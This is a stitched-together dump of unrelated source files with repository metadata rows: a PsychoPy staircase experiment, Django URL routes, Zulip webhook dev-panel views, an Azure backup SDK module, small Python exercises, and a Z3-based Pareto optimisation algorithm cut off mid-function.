timeAndDateStr = time.strftime("%H:%M on %d %b %Y", time.localtime())
msg = ('prefaceStaircase phase' if expStop else '')
msg += ('ABORTED' if expStop else 'Finished') + \
' staircase part of experiment at ' + timeAndDateStr
logging.info(msg)
print(msg)
printStaircase(staircase, descendingPsycho, briefTrialUpdate=True,
printInternalVal=True, alsoLog=False)
# print('staircase.quantile=',round(staircase.quantile(),2),' sd=',round(staircase.sd(),2))
threshNoise = round(staircase.quantile(), 3)
if descendingPsycho:
threshNoise = 100 - threshNoise
# e.g. ff get all trials wrong, posterior peaks at a very negative number
threshNoise = max(0, threshNoise)
msg = 'Staircase estimate of threshold = ' + \
str(threshNoise) + ' with sd=' + str(round(staircase.sd(), 2))
logging.info(msg)
print(msg)
myWin.close()
# Fit and plot data
fit = None
try:
intensityForCurveFitting = staircase.intensities
if descendingPsycho:
intensityForCurveFitting = 100-staircase.intensities # because fitWeibull assumes curve is ascending
fit = data.FitWeibull(intensityForCurveFitting, staircase.data,
expectedMin=1/26., sems=1.0/len(staircase.intensities))
except:
print("Fit failed.")
plotDataAndPsychometricCurve(staircase, fit, descendingPsycho, threshCriterion)
# save figure to file
pylab.savefig(fileName+'.pdf')
print('The plot has been saved, as '+fileName+'.pdf')
pylab.show() # must call this to actually show plot
else: # not staircase
noisePercent = defaultNoiseLevel
phasesMsg = 'Experiment will have ' + \
str(trials.nTotal)+' trials. Letters will be drawn with superposed noise of' + \
"{:.2%}".format(defaultNoiseLevel)
print(phasesMsg)
logging.info(phasesMsg)
# myWin= openMyStimWindow(); myWin.flip(); myWin.flip();myWin.flip();myWin.flip()
nDoneMain = 0
while nDoneMain < trials.nTotal and expStop == False:
if nDoneMain == 0:
msg = 'Starting main (non-staircase) part of experiment'
logging.info(msg)
print(msg)
thisTrial = trials.next() # get a proper (non-staircase) trial
cue1pos = thisTrial['cue1pos']
cue2lag = None
spatialPos = thisTrial['cueCoords']
if task == "T1T2":
cue2lag = thisTrial['cue2lag']
letterSequence, cuesPos, correctAnswers, resetCorrectAnswers, ts = do_RSVP_stim(
cue1pos, spatialPos, cue2lag, noisePercent/100., nDoneMain)
numCasesInterframeLong = timingCheckAndLog(ts, nDoneMain)
responseDebug = False
responses = list()
responsesAutopilot = list()
expStop, passThisTrial, responses, responsesAutopilot = \
stringResponse.collectStringResponse(numRespsWanted, respPromptStim, respStim, acceptTextStim, myWin, clickSound, badKeySound,
requireAcceptance, autopilot, responseDebug=True)
# tempResp = list(letterSequence)
# correctIndex1 = tempResp.index(correctAnswers[0])
# correctIndex2 = tempResp.index(correctAnswers[1])
# respIndex1 = tempResp.index(letterToNumber(responses[0]))
# respIndex2 = tempResp.index(letterToNumber(responses[1]))
# diffIndex1 = correctIndex1 - respIndex1
# diffIndex2 = correctIndex2 - respIndex2
#
# print(cue2lag)
correctResponseStim = visual.TextStim(
myWin, text="The correct answer is : "+str(correctAnswers[0])+", "+str(correctAnswers[1]))
event.waitKeys()
while not event.getKeys():
correctResponseStim.draw()
myWin.flip()
print('responses=', responses)
print('expStop=', expStop, ' passThisTrial=', passThisTrial, ' responses=',
responses, ' responsesAutopilot =', responsesAutopilot)
if not expStop:
# first thing printed on each line of dataFile
print('main\t', end='', file=dataFile)
print(nDoneMain, '\t', end='', file=dataFile)
print(subject, '\t', task, '\t', round(noisePercent, 3), '\t', end='', file=dataFile)
correct, eachCorrect, eachApproxCorrect, T1approxCorrect, passThisTrial, expStop = (
handleAndScoreResponse(passThisTrial, responses, responsesAutopilot, task, letterSequence, cuesPos, correctAnswers, spatialPos))
# timingBlips, last thing recorded on each line of dataFile
print(numCasesInterframeLong, file=dataFile)
numTrialsCorrect += correct # so count -1 as 0
numTrialsApproxCorrect += eachApproxCorrect.all()
numTrialsEachCorrect += eachCorrect
numTrialsEachApproxCorrect += eachApproxCorrect
if task == "T1T2":
cue2lagIdx = list(possibleCue2lags).index(cue2lag)
nTrialsCorrectT2eachLag[cue2lagIdx] += eachCorrect[1]
nTrialsApproxCorrectT2eachLag[cue2lagIdx] += eachApproxCorrect[1]
nTrialsEachLag[cue2lagIdx] += 1
if exportImages: # catches one frame of response
myWin.getMovieFrame() # I cant explain why another getMovieFrame, and core.wait is needed
framesSaved += 1
core.wait(.1)
myWin.saveMovieFrames('exported/frames.mov')
expStop = True
core.wait(.1)
if feedback:
play_high_tone_correct_low_incorrect(correct, passThisTrial=False)
nDoneMain += 1
dataFile.flush()
logging.flush()
print('nDoneMain=', nDoneMain, ' trials.nTotal=',
trials.nTotal) # ' trials.thisN=',trials.thisN
if (trials.nTotal > 6 and nDoneMain > 2 and nDoneMain %
(trials.nTotal*pctCompletedBreak/100.) == 1): # dont modulus 0 because then will do it for last trial
nextText.setText('Press "SPACE" to continue!')
nextText.draw()
progressMsg = 'Completed ' + str(nDoneMain) + \
' of ' + str(trials.nTotal) + ' trials'
NextRemindCountText.setText(progressMsg)
NextRemindCountText.draw()
myWin.flip() # myWin.flip(clearBuffer=True)
waiting = True
while waiting:
if autopilot:
break
elif expStop == True:
break
for key in event.getKeys(): # check if pressed abort-type key
if key in ['space', 'ESCAPE']:
waiting = False
if key in ['ESCAPE']:
expStop = False
myWin.clearBuffer()
core.wait(.2)
time.sleep(.2)
# end main trials loop
timeAndDateStr = time.strftime("%H:%M on %d %b %Y", time.localtime())
msg = 'Finishing at '+timeAndDateStr
print(msg)
logging.info(msg)
if expStop:
msg = 'user aborted experiment on keypress with trials done=' + \
str(nDoneMain) + ' of ' + str(trials.nTotal+1)
print(msg)
logging.error(msg)
if not doStaircase and (nDoneMain > 0):
print('Of ', nDoneMain, ' trials, on ', numTrialsCorrect*1.0/nDoneMain*100., '% of all trials all targets reported exactly correct', sep='')
print('All targets approximately correct in ', round(numTrialsApproxCorrect*1.0/nDoneMain*100, 1), '% of trials', sep='')
print('T1: ', round(numTrialsEachCorrect[0]*1.0/nDoneMain*100., 2), '% correct', sep='')
if len(numTrialsEachCorrect) > 1:
print('T2: ', round(numTrialsEachCorrect[1]*1.0/nDoneMain*100, 2), '% correct', sep='')
print('T1: ', round(numTrialsEachApproxCorrect[0]*1.0/nDoneMain*100, 2), '% approximately correct', sep='')
if len(numTrialsEachCorrect) > 1:
print('T2: ', round(numTrialsEachApproxCorrect[1]*1.0/nDoneMain*100, 2), '% approximately correct', sep='')
print('T2 for each of the lags,', np.around(possibleCue2lags, 0), ': ', np.around(100*nTrialsCorrectT2eachLag / nTrialsEachLag, 3), '%correct, and ',
np.around(100*nTrialsApproxCorrectT2eachLag/nTrialsEachLag, 3), '%approximately correct')
# print numRightWrongEachSpeedOrder[:,1] / ( numRightWrongEachSpeedOrder[:,0] + numRightWrongEachSpeedOrder[:,1])
logging.flush()
dataFile.close()
myWin.close() # have to close window if want to show a plot
# ADD PLOT OF AB PERFORMANCE?
| [
"[email protected]"
] | |
689cb975bfecd8db5e093abf10d4ce088eda3841 | 77c2010bb9533ecbdfa46cd41c16ee5ae26e94fa | /blog/urls.py | f47fe3383b5e4c15a25bebd8f057c5476da21240 | [] | no_license | dimansion/portfolio-django | b2cbb28dff97dd03cdf795f0bc661d39bcfae83d | 2dffe0e8579b2a426cb7aceb1ee085933b122d90 | refs/heads/master | 2020-05-23T08:15:38.205372 | 2017-03-05T14:44:14 | 2017-03-05T14:44:14 | 70,251,368 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 501 | py | from django.conf.urls import url
from django.contrib import admin
from .views import (
post_list,
post_create,
post_detail,
post_update,
post_delete,
)
urlpatterns = [
url(r'^$', post_list, name='list'),
url(r'^create/$', post_create),
url(r'^(?P<slug>[\w-]+)/$', post_detail, name='detail'),
url(r'^(?P<slug>[\w-]+)/edit/$', post_update, name='update'),
url(r'^(?P<slug>[\w-]+)/delete/$', post_delete),
#url(r'^<posts></posts>/$', "<appname>.views.<function_name>"),
] | [
"[email protected]"
] | |
952a83fef5c7290c002d8325d0d09c4de2fc2f89 | 94d5467b1315791fa75165eb862fdd8fef300958 | /yunyan_baotou/src/user_prob/bak/prob_trans.py | 5c962bdbf3d75cd901bff55b83083745fea7fde2 | [] | no_license | scmsqhn/code | e31926174c247d49c1db8f121e3ec1b82f8a2d9d | b389d7dc5fafad8a4185a03cd6d5519ccf8f99df | refs/heads/master | 2022-12-09T05:37:07.065840 | 2019-05-14T01:55:07 | 2019-05-14T01:55:07 | 185,903,771 | 1 | 0 | null | 2022-12-08T05:05:51 | 2019-05-10T02:22:28 | Python | UTF-8 | Python | false | false | 448 | py | #P={'B': {'E': -0.510825623765990, 'M': -0.916290731874155},
# 'E': {'B': -0.5897149736854513, 'S': -0.8085250474669937},
# 'M': {'E': -0.33344856811948514, 'M': -1.2603623820268226},
# 'S': {'B': -0.7211965654669841, 'S': -0.6658631448798212}}
P={'B': {'E': -3.2770032528476309, 'M': -1.030296703073057},
'E': {'B': -3.2770032528476309 , 'S': -1e+10},
'M': {'E': -1.030296703073057, 'M': -1.3924866568570602},
'S': {'B': -1e+10, 'S': -1e+10}}
| [
"[email protected]"
] | |
d923053a034a799be752fd757cda0a0a54a7f8e4 | b3c3b09a2abc71b35fc54da16f2b4d88b254fc4b | /zerver/views/development/integrations.py | fba4308be9525cf13491593a658ca06e12e346b9 | [
"Apache-2.0",
"LicenseRef-scancode-free-unknown"
] | permissive | yovanycunha/zulip | 2fc57ba2f35736d13b609f763e1b36f6686c4a80 | 339f742578c15cc9c72d44963e621986629818bb | refs/heads/master | 2020-09-03T04:12:41.356314 | 2019-11-03T22:02:37 | 2019-11-03T23:51:19 | 219,382,296 | 1 | 0 | Apache-2.0 | 2019-11-03T23:51:44 | 2019-11-03T23:51:44 | null | UTF-8 | Python | false | false | 5,681 | py | import os
import ujson
from typing import Any, Dict, List
from django.http import HttpRequest, HttpResponse
from django.shortcuts import render
from django.test import Client
from zerver.lib.integrations import WEBHOOK_INTEGRATIONS
from zerver.lib.request import has_request_variables, REQ
from zerver.lib.response import json_success, json_error
from zerver.models import UserProfile, get_realm
from zerver.lib.webhooks.common import get_fixture_http_headers, \
standardize_headers
ZULIP_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../../')
def get_webhook_integrations() -> List[str]:
return [integration.name for integration in WEBHOOK_INTEGRATIONS]
def dev_panel(request: HttpRequest) -> HttpResponse:
integrations = get_webhook_integrations()
bots = UserProfile.objects.filter(is_bot=True, bot_type=UserProfile.INCOMING_WEBHOOK_BOT)
context = {"integrations": integrations, "bots": bots}
return render(request, "zerver/integrations/development/dev_panel.html", context)
def send_webhook_fixture_message(url: str=REQ(),
body: str=REQ(),
is_json: bool=REQ(),
custom_headers: Dict[str, Any]=REQ()) -> HttpResponse:
client = Client()
realm = get_realm("zulip")
standardized_headers = standardize_headers(custom_headers)
http_host = standardized_headers.pop("HTTP_HOST", realm.host)
if is_json:
content_type = standardized_headers.pop("HTTP_CONTENT_TYPE", "application/json")
else:
content_type = standardized_headers.pop("HTTP_CONTENT_TYPE", "text/plain")
return client.post(url, body, content_type=content_type, HTTP_HOST=http_host,
**standardized_headers)
@has_request_variables
def get_fixtures(request: HttpResponse,
integration_name: str=REQ()) -> HttpResponse:
integrations = get_webhook_integrations()
if integration_name not in integrations:
return json_error("\"{integration_name}\" is not a valid webhook integration.".format(
integration_name=integration_name), status=404)
fixtures = {}
fixtures_dir = os.path.join(ZULIP_PATH, "zerver/webhooks/{integration_name}/fixtures".format(
integration_name=integration_name))
if not os.path.exists(fixtures_dir):
msg = ("The integration \"{integration_name}\" does not have fixtures.").format(
integration_name=integration_name)
return json_error(msg, status=404)
for fixture in os.listdir(fixtures_dir):
fixture_path = os.path.join(fixtures_dir, fixture)
with open(fixture_path, 'r') as f:
body = f.read()
try:
body = ujson.loads(body)
except ValueError:
pass # The file extension will be used to determine the type.
headers_raw = get_fixture_http_headers(integration_name,
"".join(fixture.split(".")[:-1]))
headers = {}
for header in headers_raw:
if header.startswith("HTTP_"): # HTTP_ is a prefix intended for Django.
headers[header.lstrip("HTTP_")] = headers_raw[header]
else:
headers[header] = headers_raw[header]
fixtures[fixture] = {"body": body, "headers": headers}
return json_success({"fixtures": fixtures})
@has_request_variables
def check_send_webhook_fixture_message(request: HttpRequest,
url: str=REQ(),
body: str=REQ(),
is_json: bool=REQ(),
custom_headers: str=REQ()) -> HttpResponse:
try:
custom_headers_dict = ujson.loads(custom_headers)
except ValueError as ve:
return json_error("Custom HTTP headers are not in a valid JSON format. {}".format(ve)) # nolint
response = send_webhook_fixture_message(url, body, is_json,
custom_headers_dict)
if response.status_code == 200:
responses = [{"status_code": response.status_code,
"message": response.content}]
return json_success({"responses": responses})
else:
return response
@has_request_variables
def send_all_webhook_fixture_messages(request: HttpRequest,
url: str=REQ(),
integration_name: str=REQ()) -> HttpResponse:
fixtures_dir = os.path.join(ZULIP_PATH, "zerver/webhooks/{integration_name}/fixtures".format(
integration_name=integration_name))
if not os.path.exists(fixtures_dir):
msg = ("The integration \"{integration_name}\" does not have fixtures.").format(
integration_name=integration_name)
return json_error(msg, status=404)
responses = []
for fixture in os.listdir(fixtures_dir):
fixture_path = os.path.join(fixtures_dir, fixture)
with open(fixture_path, 'r') as f:
content = f.read()
x = fixture.split(".")
fixture_name, fixture_format = "".join(_ for _ in x[:-1]), x[-1]
headers = get_fixture_http_headers(integration_name, fixture_name)
if fixture_format == "json":
is_json = True
else:
is_json = False
response = send_webhook_fixture_message(url, content, is_json, headers)
responses.append({"status_code": response.status_code,
"fixture_name": fixture,
"message": response.content})
return json_success({"responses": responses})
| [
"[email protected]"
] | |
45d3ae300ef4fa451f0e6b75cff19ba93f979adc | aa0270b351402e421631ebc8b51e528448302fab | /sdk/recoveryservices/azure-mgmt-recoveryservicesbackup/azure/mgmt/recoveryservicesbackup/activestamp/operations/_protection_policy_operation_results_operations.py | 58b5481810d826165bfeac369e00feb3a9394861 | [
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] | permissive | fangchen0601/azure-sdk-for-python | d04a22109d0ff8ff209c82e4154b7169b6cb2e53 | c2e11d6682e368b2f062e714490d2de42e1fed36 | refs/heads/master | 2023-05-11T16:53:26.317418 | 2023-05-04T20:02:16 | 2023-05-04T20:02:16 | 300,440,803 | 0 | 0 | MIT | 2020-10-16T18:45:29 | 2020-10-01T22:27:56 | null | UTF-8 | Python | false | false | 7,201 | py | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import sys
from typing import Any, Callable, Dict, Optional, TypeVar
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
from .._serialization import Serializer
from .._vendor import RecoveryServicesBackupClientMixinABC, _convert_request, _format_url_section
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_get_request(
vault_name: str, resource_group_name: str, policy_name: str, operation_id: str, subscription_id: str, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2023-02-01"] = kwargs.pop("api_version", _params.pop("api-version", "2023-02-01"))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupPolicies/{policyName}/operationResults/{operationId}",
) # pylint: disable=line-too-long
path_format_arguments = {
"vaultName": _SERIALIZER.url("vault_name", vault_name, "str"),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, "str"),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str"),
"policyName": _SERIALIZER.url("policy_name", policy_name, "str"),
"operationId": _SERIALIZER.url("operation_id", operation_id, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
class ProtectionPolicyOperationResultsOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.recoveryservicesbackup.activestamp.RecoveryServicesBackupClient`'s
:attr:`protection_policy_operation_results` attribute.
"""
models = _models
def __init__(self, *args, **kwargs):
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace
def get(
self, vault_name: str, resource_group_name: str, policy_name: str, operation_id: str, **kwargs: Any
) -> _models.ProtectionPolicyResource:
"""Provides the result of an operation.
:param vault_name: The name of the recovery services vault. Required.
:type vault_name: str
:param resource_group_name: The name of the resource group where the recovery services vault is
present. Required.
:type resource_group_name: str
:param policy_name: Backup policy name whose operation's result needs to be fetched. Required.
:type policy_name: str
:param operation_id: Operation ID which represents the operation whose result needs to be
fetched. Required.
:type operation_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ProtectionPolicyResource or the result of cls(response)
:rtype: ~azure.mgmt.recoveryservicesbackup.activestamp.models.ProtectionPolicyResource
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2023-02-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
cls: ClsType[_models.ProtectionPolicyResource] = kwargs.pop("cls", None)
request = build_get_request(
vault_name=vault_name,
resource_group_name=resource_group_name,
policy_name=policy_name,
operation_id=operation_id,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
_stream = False
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("ProtectionPolicyResource", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupPolicies/{policyName}/operationResults/{operationId}"
}
| [
"[email protected]"
] | |
5ac37bff1e1c67144707a66c27ca55b95a253605 | e1b8fb9a5500516f28d3d7e9a5f259c49ef35f14 | /top/api/rest/ItempropvaluesGetRequest.py | 1641824f67bf20947dfd5c1e6d7cc49197575d1e | [] | no_license | htom78/taobao_comet_py | 9224dbca1a413a54bcc5569873e4c7a9fc9ba059 | ad8b2e983a14d3ab7665244449f79dd72f390815 | refs/heads/master | 2020-05-17T10:47:28.369191 | 2013-08-27T08:50:59 | 2013-08-27T08:50:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 370 | py | '''
Created by auto_sdk on 2013-06-16 16:36:02
'''
from top.api.base import RestApi
class ItempropvaluesGetRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
self.cid = None
self.fields = None
self.pvs = None
self.type = None
def getapiname(self):
return 'taobao.itempropvalues.get'
| [
"[email protected]"
] | |
ef5540685a093ff38d640fd18b6e7e5528ee2196 | 8292648c36f4b1e8eb70c0992eec3737dc7d7749 | /exam_practice/Samples/Sample 6/sample_6.py | fb8d6c663edd847d65fb057da8c8f45486bd82f2 | [] | no_license | LukeElliman/Sandbox | 6f4dc2b57db4475dab376fa4de8ec7b3a0cd238e | 519ab171c121ca7f7dc22c484836314b816033be | refs/heads/master | 2023-05-24T06:53:57.638685 | 2021-06-05T12:57:12 | 2021-06-05T12:57:12 | 344,040,938 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 235 | py | def count_words(sentence):
"""Count words in sentence"""
words = sentence.split(" ")
return len(words)
print(count_words("This is a sentence with words in it"))
print(count_words(("Hello, my name is Luke, whats your's?"))) | [
"[email protected]"
] | |
e384b0b89ef2675764b8f90db90e2618a131954f | 0e3d0ac18a0605c26ac004c6da904d06d1f93ad0 | /decorators_exercise/execution_time.py | 1c81a3a6fb46897c9dd2a914709b3568ab0a67a0 | [] | no_license | lion963/Python-OOP | a74c85918bf7400dc5ffc82ff4c02b699969b1b1 | 24d184030f6cac8288d27a17cecb64bd133c1cf6 | refs/heads/main | 2023-04-06T05:48:53.945037 | 2021-04-15T07:28:35 | 2021-04-15T07:28:35 | 333,083,111 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 493 | py | import time
def exec_time(func):
def wrapper(*args):
start_time = time.time()
func(*args)
return time.time() - start_time
return wrapper
@exec_time
def loop(start, end):
total = 0
for x in range(start, end):
total += x
return total
print(loop(1, 10000000))
@exec_time
def concatenate(strings):
result = ""
for string in strings:
result += string
return result
print(concatenate(["a" for i in range(1000000)]))
| [
"[email protected]"
] | |
c62b5ee746ccfce616744d13ae9e9517ab93fae9 | a8079efec61894fb6082986e66c4c146757fc895 | /src/gia/npGIAforZ3.py | d215c013d3ac83180938d3cafbd33092e4b60d34 | [] | no_license | gsdlab/ClaferSMT | aaa5bd0c0c72f6a9b156529a871cced40e006cba | d8240b4503107641d62f7f913ebe50a88182d9a3 | refs/heads/master | 2021-01-16T21:23:22.838308 | 2015-08-20T00:24:54 | 2015-08-20T00:24:54 | 9,037,961 | 2 | 1 | null | 2018-08-21T13:48:02 | 2013-03-26T19:00:12 | TeX | UTF-8 | Python | false | false | 13,428 | py |
from common import Common, SMTLib
from common.Common import preventSameModel
from time import time
from solvers import BaseSolver
#Modified by Jianmei for EPOAL
# count #ParetoPoints
# count #satcalls and #unsatcalls
# print every found Pareto point (especially for Eshop)
OUTPUT_PARETO_FRONT = False
RECORDPOINT = False
def setRecordPoint(b):
global RECORDPOINT
RECORDPOINT = b
class GuidedImprovementAlgorithmOptions(object):
def __init__(self, verbosity=False, useSummaryStatsFile=False, \
SummaryStatsFilename="", incrementallyWriteLog=False, \
writeLogFilename="", writeTotalTimeFilename="timefile.csv", \
writeRandomSeedsFilename="randomseed.csv", \
exclude_variables_in_printout=[],\
incrementallyprintparetopoints=False,
useCallLogs=False, num_models=-1, magnifying_glass=False):
self.verbosity = verbosity
self.useSummaryStatsFile = useSummaryStatsFile
self.SummaryStatsFilename = SummaryStatsFilename
self.exclude_variables_in_printout = exclude_variables_in_printout
self.incrementallyWriteLog = incrementallyWriteLog
self.writeLogFilename = writeLogFilename
self.writeTotalTimeFilename = writeTotalTimeFilename
self.useCallLogs = useCallLogs
if self.writeLogFilename != "":
self.logfile = open(self.writeLogFilename, "w")
self.incrementallyprintparetopoints = incrementallyprintparetopoints
self.writeRandomSeedsFilename = writeRandomSeedsFilename
self.magnifying_glass = magnifying_glass
self.num_models = num_models
class GuidedImprovementAlgorithm(object):
def __init__(self, cfr_inst, s, metrics_variables, metrics_objective_direction, decision_variables=[], options=GuidedImprovementAlgorithmOptions()):
self.cfr = cfr_inst
self.s = s
self.metrics_variables = metrics_variables
self.metrics_objective_direction = metrics_objective_direction
self.decision_variables = decision_variables
self.options = options
self.verbosity = self.options.verbosity
'''
CAUTION: REMOVED FUNCTIONALITY FOR OUTPUT E.G RECORDPOINT STUFF BELOW
'''
def genEquivalentSolutions(self, point, count):
self.s.push()
equivalentSolutions = []
equalConstraint = self.ConstraintEqualToX(point)
self.s.add(equalConstraint)
preventSameModel(self.cfr, self.s, point)
while(self.s.check() == Common.SAT and not(len(equivalentSolutions) + count == self.options.num_models)):
solution = self.s.model()
preventSameModel(self.cfr, self.s, solution)
equivalentSolutions.append(solution)
self.s.pop()
return equivalentSolutions
def addParetoPoints(self, ParetoFront, point):
ParetoFront.append(point)
return ParetoFront
def replicateSolver(self, solver, num_consumers):
solvers = []
for _ in range(num_consumers):
newSolver = BaseSolver.getSolver()
for j in solver.assertions():
newSolver.add(j)
solvers.append(newSolver)
return solvers
def ExecuteGuidedImprovementAlgorithm(self, outfilename):
"""
Ran the Guided Improvement Algorithm.
"""
count_paretoPoints = 0
ParetoFront = []
initial_start_time = time()
start_time = time()
count_sat_calls = 0
count_unsat_calls = 0
if self.options.magnifying_glass:
self.s.push()
if self.s.check() == Common.SAT:
count_sat_calls += 1
prev_solution = self.s.model()
self.s.push()
FirstParetoPoint, local_count_sat_calls, local_count_unsat_calls = self.ranToParetoFront(prev_solution)
end_time = time()
count_sat_calls += local_count_sat_calls
count_unsat_calls += local_count_unsat_calls
count_paretoPoints += 1
ParetoFront = self.addParetoPoints(ParetoFront, FirstParetoPoint)
strNextParetoPoint = list((d.name(), str(FirstParetoPoint[d])) for d in FirstParetoPoint.decls())
if RECORDPOINT:
outputFile = open(outfilename, 'a')
try:
outputFile.writelines(str(count_paretoPoints) + ',' +
str(count_sat_calls) + ',' +
str(end_time - start_time) + ',' +
str(strNextParetoPoint) + ',' +
'\n')
finally:
outputFile.close()
self.s.pop()
tmpNotDominatedByFirstParetoPoint = self.ConstraintNotDominatedByX(FirstParetoPoint)
self.s.add(tmpNotDominatedByFirstParetoPoint)
start_time = time()
while(self.s.check() == Common.SAT and not(len(ParetoFront) == self.options.num_models)):
count_sat_calls += 1
prev_solution = self.s.model()
self.s.push()
NextParetoPoint, local_count_sat_calls, local_count_unsat_calls = self.ranToParetoFront(prev_solution)
end_time = time()
count_sat_calls += local_count_sat_calls
count_unsat_calls += local_count_unsat_calls
count_paretoPoints += 1
ParetoFront = self.addParetoPoints(ParetoFront, NextParetoPoint)
# RecordPoint
strNextParetoPoint = list((d.name(), str(FirstParetoPoint[d])) for d in FirstParetoPoint.decls())
if RECORDPOINT:
outputFile = open(outfilename, 'a')
try:
outputFile.writelines(str(count_paretoPoints) + ',' +
str(count_sat_calls) + ',' +
str(end_time - start_time) + ',' +
str(strNextParetoPoint) + ',' +
'\n')
finally:
outputFile.close()
self.s.pop()
tmpNotDominatedByNextParetoPoint = self.ConstraintNotDominatedByX(NextParetoPoint)
self.s.add(tmpNotDominatedByNextParetoPoint)
start_time = time()
count_unsat_calls += 1
end_time = time()
if self.options.magnifying_glass:
self.s.pop()
for i in ParetoFront:
equivalentSolutions = self.genEquivalentSolutions(i, len(ParetoFront))
ParetoFront = ParetoFront + equivalentSolutions
outputFile = open(outfilename, 'a')
try:
outputFile.writelines(str(count_paretoPoints) + ',' +
str(count_sat_calls) + ',' +
str(count_unsat_calls) + ',' +
str(end_time - initial_start_time) + ',' +
'\n')
finally:
outputFile.close()
return ParetoFront
def print_stats_info(self, end_time, start_time, ParetoFront):
statsfile_fd = open(self.args.statsfile, "a")
self.print_header_if_file_is_empty(statsfile_fd)
statsfile_fd.write( "%s, %s,%s\n" % (self.optimizationmodelname , (end_time - start_time), len(ParetoFront)))
statsfile_fd.close()
def print_header_if_file_is_empty(self, statsfile_fd):
if statsfile_fd.tell() == 0:
statsfile_fd.write("%s, %s, %s\n" % ('model name' , 'time to compute pareto front', 'length of pareto front'))
def print_solution(self, solution):
"""
Prints the objective value for the solution in one line, followed by the decision variables in the next line.
"""
SolutionSpacePoint = []
for metric in self.metrics_variables:
SolutionSpacePoint.append(solution[metric])
print(SolutionSpacePoint)
DecisionSpacePoint = []
for instVariable in solution.decls() :
if instVariable.name() not in self.exclude_variables_in_printout:
DecisionSpacePoint.append("%s=%s" % (instVariable.name(), solution[instVariable]))
print(DecisionSpacePoint)
def ranToParetoFront(self, prev_solution):
"""
Iterates until a pareto optimal solution is found.
"""
local_count_sat_calls = 0
local_count_unsat_calls = 0
tmpConstraintMustDominateX= self.ConstraintMustDominatesX(prev_solution)
self.s.add(tmpConstraintMustDominateX)
while (self.s.check() == Common.SAT):
local_count_sat_calls += 1
prev_solution = self.s.model()
tmpConstraintMustDominateX = self.ConstraintMustDominatesX(prev_solution)
self.s.add(tmpConstraintMustDominateX)
local_count_unsat_calls += 1
return prev_solution, local_count_sat_calls, local_count_unsat_calls
def ConstraintNotDominatedByX(self, model):
"""
Creates a constraint preventing search in dominated regions.
"""
DisjunctionOrLessMetrics = list()
for i in range(len(self.metrics_variables)):
if self.metrics_objective_direction[i] == Common.METRICS_MAXIMIZE:
DisjunctionOrLessMetrics.append(SMTLib.SMT_GT(self.metrics_variables[i], SMTLib.SMT_IntConst(Common.evalForNum(model, self.metrics_variables[i].convert(self.cfr.solver.converter)))))#model[self.metrics_variables[i]])
else :
